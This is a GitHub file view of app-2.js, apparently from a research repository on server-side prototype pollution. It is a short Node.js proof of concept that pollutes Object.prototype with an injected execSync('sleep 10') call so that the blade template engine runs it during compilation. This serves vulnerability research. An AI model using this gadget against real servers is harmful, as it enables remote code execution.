forked from KTH-LangSec/server-side-prototype-pollution
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathapp-2.js
More file actions
22 lines (17 loc) · 669 Bytes
/
app-2.js
File metadata and controls
22 lines (17 loc) · 669 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
const blade = require('blade');
const fs = require('fs');
const path = require('path');
Object.prototype.value = "somevalue"
Object.prototype.exposing = ["global.process.mainModule.require('child_process').execSync('sleep 10')"]
// This template includes the `include` directive
const mainFilePath = path.join(__dirname, '/views/include.blade');
fs.readFile(mainFilePath, 'utf8', (err, mainFile) => {
if (err) throw err;
blade.compile(mainFile, { filename: mainFilePath, debug: true }, (err, tmpl) => {
if (err) throw err;
tmpl({}, function(err, html) {
if (err) throw err;
console.log(html);
});
});
});